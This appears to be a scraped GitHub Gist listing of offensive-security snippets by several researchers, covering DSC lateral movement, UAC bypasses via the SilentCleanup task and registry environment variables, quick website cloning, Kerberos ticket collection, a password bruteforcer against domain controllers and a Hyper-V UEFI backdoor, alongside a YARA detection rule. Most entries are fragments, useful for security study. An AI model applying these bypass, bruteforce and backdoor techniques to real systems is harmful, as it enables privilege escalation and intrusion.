James Hovious JamesHovious

View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
makelariss /
Last active Jun 17, 2021
Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*-
# All credits go to
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
It also contains environment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe). The environment variables are stored in the HKCU registry hive, which is write accessible by a user (HKCU\Environment).
We can perform an AlwaysNotify UAC Bypass by changing the environment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
Mr-Un1k0d3r /
Created Nov 7, 2017
Lazy website cloning
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"
mattifestation / WDAG_CI_Policy.xml
Created Oct 18, 2017
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="" xmlns:xsi="" xmlns="urn:schemas-microsoft-com:sipolicy">
curi0usJack / .htaccess
Last active Aug 2, 2022
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
# Note this version requires Apache 2.4+
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
# Include /etc/apache2/redirect.rules
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active Jun 9, 2022
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
Gets the Kerberos Ticket Granting Tickets from all Logon Sessions
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
williballenthin / stackstrings.yara
Last active Nov 1, 2021
match x86 that appears to be stack string creation
rule stack_strings
author = "William Ballenthin"
email = ""
license = "Apache 2.0"
copyright = "FireEye, Inc"
description = "Match x86 that appears to be stack string creation."
Cr4sh / DmaHvBackdoor.c
Last active Jul 29, 2022
Hyper-V backdoor for UEFI
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which is called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers execution to previously loaded Hyper-V kernel (hvix64.sys)
ropnop /
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
View bypass_uac.ps1
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager